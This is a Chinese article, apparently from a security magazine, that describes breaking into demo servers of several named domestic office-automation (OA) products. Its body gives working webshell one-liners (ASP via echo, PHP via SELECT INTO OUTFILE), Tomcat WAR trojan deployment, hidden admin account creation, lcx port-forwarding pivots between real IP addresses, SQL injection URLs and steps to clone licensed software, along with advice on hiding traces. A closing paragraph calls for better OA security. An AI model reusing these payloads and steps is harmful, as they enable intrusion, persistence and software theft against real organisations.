国内OA 安全现状初探
[关键字]:OA ,J2EE,Servlet,Tomcat应用,克隆
[技术要点]: 本文以华天、金和两款OA 系统为例,为读者展示安全隐患给OA 带来的创伤——不但系统本身被破解,而且殃及到服务器的安全。并对国内使用比较多的OA ,如通达、华天、金和、泛微、致力协同、新思创等作了检测与分析,几乎都存在安全隐患,这使我们不能不为国内OA 系统的安全感到担忧。
[主要内容]:
一、突破华天
1、Tocmcat挂马
1)Tomcat基础。简单介绍了Tomcat目录结构、web.xml和Server.xml配置文件的主要元素,以及Tomcat调用Servlet的过程;
2)Tomcat挂马。将jsp木马打包成War文件,然后在Tomcat的管理页面,上传展开(Deploy)该War文件,完成挂马。
War文件,即网络应用程序文件(Web Archive file),一种与平台无关的文件格式,它允许将许多文件组合成一个存档文件,为 J2EE 应用程序创建的 JAR 文件是 EAR 文件(企业 JAR 文件),而War专用在Web方面。
3)Tomcat日志。在Tomcat的日志目录logs中以文本方式保存着Tomcat运行的详细信息,这里我们强调两处。一个是Tomcat启动信 息,从中我们可以获取Mysql连接用户密码的Base64加密值,再者就是我们上传War以及访问jsp木马的痕迹也被详细记录。这也启示我们在分析 Tomcat日志时,应注意“<admin> [Main] Log in”、“Associated with Deployer”等字符。
2、克隆华天
远程桌面登陆华天OA 的Demo服务器,完成华天OA 的“克隆”——完整复制OA 安装目录!本地安装后再使用update修改administrator的超级用户密码,就这样,我们获得了一个没有功能和时间限制的华天OA 系统!
二、破解金和
1、 注入挂马。访http://demos.jh0101.com/ioas 选择用户进入系统,找到注入点。
1)Dos命令Echo写马。我们使用XIAOLU的SQL INJ Commander工具(MSSQL注入的命令行工具,稳定速度快),可执行DOS内外部命令比如dir、net、netstat等,Web目录为“d:/IOA S/ioas”,使用echo写一句话木马。
Code:
//echo写一句话木马,使用SQL INJ Commander工具时注意“%”要使用“%25”
echo ^<%25If Request("#")^<^>"" Then Execute(Request("#"))%25^> >d:/ioas/ioas/book/book_xxx.asp
2)PhpMyAdmin写马。金和Demos服务器还使用XAMPP(Apache+MySQL+PHP+PERL建站集成软件包)架设了Apache 支持Php,使用81端口,安装目录为“d:/xampp”,web目录为“d:/xampp/ htdocs”。这时我们还可以利用phpmyadmin写一句话木马,因为它连接的Mysql权限一般是很高的。我们利用Dos命令type获得 Mysql的连接密码(从php站点jhcrm_zm的连接文件config.inc.php或phpmyadmin配置文件的 config.inc.php获得)。然后登陆到PhpMyAdmin,选择一个数据库,执行Sql语句写php一句话木马。
Code:
//利用MySql语句写php一句话木马
select '<?php eval($_POST[cmd]);?>' into outfile 'd://xampp//htdocs//jhqe.php'
2、内网渗透。利用华天Demo服务器作为跳板连接金和Demos服务器(lcx.exe已上传,3389已开启,并且已添加管理员用户,命令“net user $jhoa jhoa /add”、“net localgroup administrators $jhoa /add”),基本数据如下:
Code:
localgroup administrators $jhoa /add”),基本数据如下:
服务器 IP Lcx.exe存放路径 连接方向 端口
demo.oa8000.com 211.144.133.246 D:/htoa/tomcat/bin/lcx.exe 本地 5555
demos.jh0101.com 211.88.14.232 D:/tools/win2003/I386/lcx.exe 远程 3389
分别执行如下命令:
Code:
//在jh0101服务器上利用WebShell执行:把远程端口3389转发到本地44端口
D:/tools/win2003/I386/lcx.exe -slave 211.144.133.246 44 211.88.14.232 3389
//在oa8000服务器(本地)上执行:监听44端口并转发到5555端口,如图29
D:/htoa/tomcat/bin/lcx.exe -listen 44 5555
当提示“Waiting another Client on port:5555….”,说明远程IP已成功连接到本地44端口,并在5555端口等待连接,这时即可使用远程桌面连接 “127.0.0.1:5555”,成功连接到远程金和Demos服务器的3389端口
注意:lcx运行后不会自动终止,以便我们在本地可以随时连接,但是这样做太明目张胆了,而且一旦使用SQL INJ Commander创建了一个lcx进程后,再次使用该工具时将出错,所以使用后应该及时终止lcx进程。首先我们使用“tasklist /svc”获得lcx进程的PID,然后使用“taskkill /pid 340 /f”强行终止lcx进程。3、注入其他Web服务器,或者利用扫描器、嗅探器等工具进行更深入的渗透。 爱ERP网 www.LoveErp.com
4、克隆金和。复制金和GOA 目录、备份JHGOA 数据库,下载到本地,架设IIS、恢复数据库,完成对金和OA 的克隆。注意:金和使用MSSQL内置函数pwdencrypt加密密码。
三、其他OA
1、新思创。官方网站www.gotooa.com ,演示网址http://5000demo.systron.net.cn , 试用用户名及密码:guest。安全问题:几乎未作任何过滤,存在严重注入!!官网下载试用版本,使用DeZender解密Php文件,我们直接分析 htmledit/include/upload.php文件,发现没有对文件类型进行限制!而且没有认证用户!看来无需登陆就可以直接上传Php文件, 汗。直接请求http://5000demo.systron.net.cn/htmledit/include/upload.php ”,另存源码为html文件,修改表单的action并增加提交按钮,上传,查看页面源码获得Php木马地址。
2、通达。官方网站www.tongda2000.com ,演示网址http://oa.tongda2000.com:81 ,Php 语言,存在数字型注入,可以爆出Sql语句和绝对路径,但是magic_quotes_gpc开启。使用%01— %19(除%09、%0a、%0c、%0d)范围的任一个字符绕过空格,构造union语句注出管理员的密码(采用Mysql的crypt函数加密,有能 力和兴趣的读者可以尝试破解)。
3、致力协同。官方网站www.xtoa.cn ,在线试用入口http://www.xtoa.cn/usetest.html ,使用Jsp语言。为了人性化,协同在OA 的登陆页面设计了“电子公告”和“最新动态”,遗憾的是却存在漏洞!问题应该是严重的,因为无需登陆便可注入!
Code:
http://219.144.222.100:8080/XTOA/SYSTEMFILES/firstpage/softdown.jsp?typeid=1%20union%20select%201 ,2,3,4,5%20from%20QJUserInfo
4、泛微。官方网站www.weaver.com.cn ,标准版演示http://www.weaver.com.cn/eoffice/index.html ,Php语言,几乎变量都未作任何过滤。
Web安全一直是动态网站不可摆脱的心痛,在经历了这些年风雨之后,随着大家安全意识的加强,逐步得到了改善,这足以令人欣喜。但是作为信息化的必然产物——OA (Office Automation,办公自动化)系统还仅处于发展的初级阶段,其概念、标准、规范还不够统一和完善,当大家都疲于完善改进功能设计时,就很难顾及系统的安全性能,就像初学代码编写,首先考虑是功能,然后才是性能。对于OA ,目前尚没有比较权威的测评标准与结果,大家仁者见仁,智者见智。作为事物的发展初期,这是在所难免的,像CMS系统发展至今,也很难评价出谁优谁劣。但是国内OA 安全现状必须引起我们的高度重视,OA 系统的使用者和研发者!只有这样才能构筑起一道更安全的网络防线。
国内OA 安全现状初探相关推荐
- SaaS模式在国内的基本现状研究
胡中英 (重庆师范大学 计算机与信息科学学院,重庆 401331) 摘要:对SaaS模式在国内的基本现状的研究,找出SaaS模式在国内的发展情况及发展趋势.主要采用文献研究法进行研究,参考了政府部门的 ...
- 国际国内云计算发展现状及未来前景
一."云计算"概述 本文讲的是国际国内云计算发展现状及未来前景,[IT168 资讯]云计算(Cloud Computing)是分布式处理(Distributed Computing ...
- 【视频】国内直播行业发展现状及盈利模式
1.国内直播行业发展现状 国内行业发展尚处于初期的混战阶段.项目多,资本杂,通过"圈明星"或者"包装主播"的方式大肆撒钱,同时内容监管不严,低俗内容频现,网信办 ...
- 浅谈国内互联网教育现状及发展趋势
浅谈国内互联网教育现状及发展趋势 说到互联网教育大环境,相信每个人都能来上几句,这正证明了其火热程度,在线教育服务是中国教育信息化发展最快的领域. 近年来,传统线下教育模式面临房租及人工成本飞涨的挑战 ...
- 国内IDC行业现状及投资策略分析
IDC(Internet Data Center),即互联网数据中心,可以为用户提供包括:申请域名.租用虚拟主机空间.服务器托管租用,云主机等服务.此外,还有国际数据公司.初始直接费用等多种含义. I ...
- 移动OA平台现状(移动运营商)
随着整个社会信息化水平的不断提高,移动办公在帮助办公人员更加方便地处理大量的日常工作的同时,对于企业的核心竟争力也有着日益重要的影响,而目前的移动办公业务己经不能满足人们的办公要求,因此对于移动办公平 ...
- 最新国内程序员现状:男女比例破历史记录,单身比例出乎意料!
众所周知,因为疫情,很多行业.企业和个人都受到了很大的影响,尤其是个人,作为员工,面临着被降薪.拖欠工资甚至裁员的处境,以往人才市场都是供不应求,但今年却有点"一职难求"的局面. ...
- 对国内IT行业现状的思考
最近持续半年的国内IT行业大裁员想必都大家听说了.正好就和朋友谈到这里,找了几个点聊一聊自己的思考. 实际上这波疫情和政策只是催化剂,先回顾一下现状,从具体的商业生态来看,大概是下面这样. 先说国内的 ...
- 一张工资条引发的关于国内OA协同办公产品的思考
年前公司财务回家生娃,年后回来这算工资发工资的人就空缺了.刚开始创业的时候,媳妇帮着发,后来公司稳定了有了财务,如今这谁都指望不上,好吧,撸起袖子自己上吧.于是,我便经历了创业8年来的第一次算工资,真 ...
- 教师节有感国内Linux之现状
<!-- @page { margin: 2cm } P { margin-bottom: 0.21cm } --> 今天又是教师节了.前天上午,我一个人在学校的校园里面溜达,发现北京大学 ...
最新文章
- oracle自治事务的写法_Oracle的自治事务
- 人脸识别技术如何应用到美颜领域?
- 数据库mysql表怎么设置外键_如何设置数据库中的外键
- python os.walk模块_Python之os.walk和os.path.walk
- Laravel核心解读--异常处理
- PHP生成随机数;订单号唯一
- Q102:光线追踪场景(4)——面朝大海
- 基于OleDb的Excel数据访问
- discuz! X3.2 自定义后台门户模块模板里的标签
- python类封装成dl_第7.9节 案例详解:Python类封装
- 《深入浅出统计学(中文版)》读书笔记【全15章】
- sharp s2 android 9,夏普s2第三方ROM AOSP(Android P)v105
- 16进制 颜色透明度
- 移动脑电在神经发展障碍研究中的运用
- 《自然语言处理简明教程》读书笔记:第十四章 文本数据挖掘
- 安卓系统中默认打开蓝牙 HCI snoop 文件的方法
- kafka zookeeper docker容器互联
- 解决“com.android.dex.DexIndexOverflowException: method ID not in [0, 0xffff]: 65536”问题
- 创建mysql数据库快照_sql语句大全之创建数据库快照
- 我也写了部lt;西游记gt;